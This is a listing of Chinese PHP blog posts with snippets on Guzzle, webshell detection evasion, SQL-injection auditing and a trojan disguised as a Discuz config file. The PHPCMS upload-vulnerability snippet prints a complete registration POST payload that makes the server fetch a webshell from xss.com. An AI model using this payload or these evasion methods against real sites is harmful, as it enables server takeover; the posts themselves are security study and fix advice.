GuzzleHttp new Pool获取body内容及带出结果

GuzzleHttp new Pool获取body内容及带出结果
$allBranches = array(); $requests = function($projects) { foreach($projects as $project) { yield new Request('GET', "projects/".$project['id']."/repository/branches?per_page=100"); } }; $pool = new Pool($this - >client, $requests($projects), ['concurrency' = >5, 'fulfilled' = > function($response, $index) use($allBranches) { $data = jso...

Guzzle 使用dome案例 及 多线程异步案例

Guzzle 使用dome案例 及 多线程异步案例
虽然早就知道很多人用 Guzzle 爬数据,但是我却从来没有真正实践过,因为在我的潜意识里,抓取是 Python 的地盘。不过前段时间,当我抓汽车之家数据的时候,好心人跟我提起 Goutte 搭配 Guzzle 是最好的爬虫,让我一直记挂在心上,加上最近打算更新一下车型数据,于是我便重写了抓取汽车之家数据的脚本。 因为我是通过接口抓取,而不是网页,所以暂时用不上 Goutte,只用 Gu...

php一句话木马检测绕过研究

php一句话木马检测绕过研究
文章作者:landgrey 0x00: 前言 一般的,利用能够执行系统命令、加载代码的函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做Webshell。 本篇文章主要探讨关于PHP语言的Webshell检测工具和平台的绕过方法,实现能够绕过以下表格中7个主流(基本代表安全行业内PHP Webshell检测的一流水平)专业工具和平台检测的PHP Webshell,构造出零提示、无警告...

PHP中的抽象类与抽象方法/静态属性和静态方法/PHP中的单利模式(单态模式)/串行化与反串行化(序列化与反序列化)/约束类型/魔术方法小结

PHP中的抽象类与抽象方法/静态属性和静态方法/PHP中的单利模式(单态模式)/串行化与反串行化(序列化与反序列化)/约束类型/魔术方法小结
PHP中的抽象类与抽象方法 1、什么是抽象方法? 没有方法体 {} 的方法,必须使用abstract 关键字修饰。这样的方,我们叫做抽象方法。 abstract function say(); // 抽象方法 2、什么是抽象类? 包含抽象方法的类就叫抽象类。抽象类必须使用abstract关键字修饰。 abstract class Person{} 3、抽象类的注意事项 ① 抽象类可以包...

PHPCMS最新版任意文件上传漏洞 及 修复方法

PHPCMS最新版任意文件上传漏洞 及 修复方法
注意这个漏洞不知道是哪位朋友爆出来的,找不到来路。。我只是给了修复建议。 首先打开注册页面,然后向注册页面POST如下payload: siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=<img src=http://xss.com/webshell//php_assert.php#.jpg>&dosubmit=1&protocol= 然后就会报错并返回shell地址...

【PHP代码审计】 初级入门SQL注入过程

【PHP代码审计】 初级入门SQL注入过程
很多同学不明白SQL注入过程,这里讲解的非常详细,所以就转载过来了。 0x02 环境搭建 PHP+MySql的集成环境特别多,像PhpStudy、Wamp和Lamp等下一步下一步点下去就成功安装了,网上搜索一下很多就不赘述。 这里提的环境是SQLol,它是一个可配置的SQL注入测试平台,包含了简单的SQL注入测试环境,即SQL语句的四元素增(Insert)、删(Delete)、改(Update)和查(Select)。 ...

一个伪装Discuz配置文件的php木马分析

一个伪装Discuz配置文件的php木马分析
问题出于土司论坛(地址):https://www.t00ls.net/thread-36298-1-1.html 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96...

php curl_getinfo的巧用

php curl_getinfo的巧用
最近使用curl的时候,发现了一个比较好用的函数,当然是初级者适用的一个函数,就是curl_getinfo(), 在抓取一个页面的时候,会遇到302页面跳转的情况,刚开始处理的时候,是用curl抓取一个域名页面的内容,适用curl_exec,抓取页面全部内容,然后用正则匹配出来用户域名url,通过此域名再次抓取此地址的内容,这样做挺麻烦的,后来发现curl_getinfo(),返回来一个数组类型的...